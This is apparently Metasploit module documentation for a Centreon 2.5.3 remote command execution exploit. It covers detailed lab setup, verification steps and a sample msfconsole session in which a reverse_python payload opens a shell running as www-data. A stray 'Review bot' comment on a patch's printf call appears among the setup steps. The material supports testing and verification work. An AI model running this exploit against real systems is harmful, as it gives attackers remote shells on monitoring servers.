## Vulnerable Application
1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
### Creating A Testing Environment
Creating a testing environment for this application contained many steps, so I figured I would document the process here.
1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was `centreon`.
2. Install php5.6 ([askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04))
```
sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
# at the prompts: select OK
# then select No Configuration
sudo apt-get install snmp-mibs-downloader
```
3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
```
sudo a2enmod php5.6
sudo a2dismod php7.0
```
4. Restart apache with `sudo apache2ctl restart`
5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6. The plugins link is broken; use [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
```
wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install
```
5.1 If you get an SSLv3 method not found error during `make`, apply this patch to `plugins/sslutils.c` (see https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)
```
--- plugins/sslutils.c.orig 2016-01-14 20:02:06.419867000 +0100
+++ plugins/sslutils.c 2016-01-14 20:01:36.091492000 +0100
@@ -70,8 +70,13 @@
#endif
break;
case 3: /* SSLv3 protocol */
+#if defined(OPENSSL_NO_SSL3)
+ printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
+ return STATE_CRITICAL;
+#else
method = SSLv3_client_method();
ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
+#endif
break;
default: /* Unsupported */
printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
```
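Review bot: In the added `OPENSSL_NO_SSL3` branch, the `printf` call has a doubled set of parentheses, so its argument is a comma expression that evaluates to the translated message alone: the `"%s\n"` format is discarded, the message itself becomes the format string, and no trailing newline is printed. Write it as `printf("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library."));` so it matches the `printf` in the `default:` case below it.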
6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install
```
7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
```
cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
```
sudo mkdir /var/log/centreon-engine
cd ~
sudo pear install XML_RPC-1.4.5
# may need to install php-xml
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
<enter>
q
y
y
y
y
y
<enter>
y
<enter>
y
<enter>
y
<enter>
y
<enter>
y
<enter>
<enter>
<enter>
centreon
<enter>
/var/log/centreon-engine
/home/centreon/nagios-plugins-2.1.1/plugins
<enter>
/etc/init.d/centengine
/usr/local/bin/centengine
/usr/local/etc/
/usr/local/etc/
/etc/init.d/centengine
<enter>
y
y
y
<enter>
y
<enter>
<enter>
y
y
<enter>
y
y
<enter>
y
<enter>
<enter>
y
y
```
10. Fix apache config
```
sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload
```
11. Configure via website. Browse to `<ip>/centreon`
```
next
next
select centreon-engine
/usr/local/lib/centreon-engine
/usr/local/bin/centenginestats
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
next
select centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/cbmod.so
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
next
Pick whatever details about your user you want, next
Fill in mysql Root password, next
next
next
finish
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/centreon_useralias_exec`
4. Do: `set payload`
5. Do: `set rhost`
6. Do: `check`
7. Do: `run`
8. You should get a shell.
## Scenarios
Just a standard run.
```
msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
rhost => 192.168.2.85
msf exploit(centreon_useralias_exec) > set verbose true
verbose => true
msf exploit(centreon_useralias_exec) > check
[+] Version Detected: 2.5.3
[*] 192.168.2.85:80 The target appears to be vulnerable.
msf exploit(centreon_useralias_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious login
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
whoami
www-data
uname -a
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```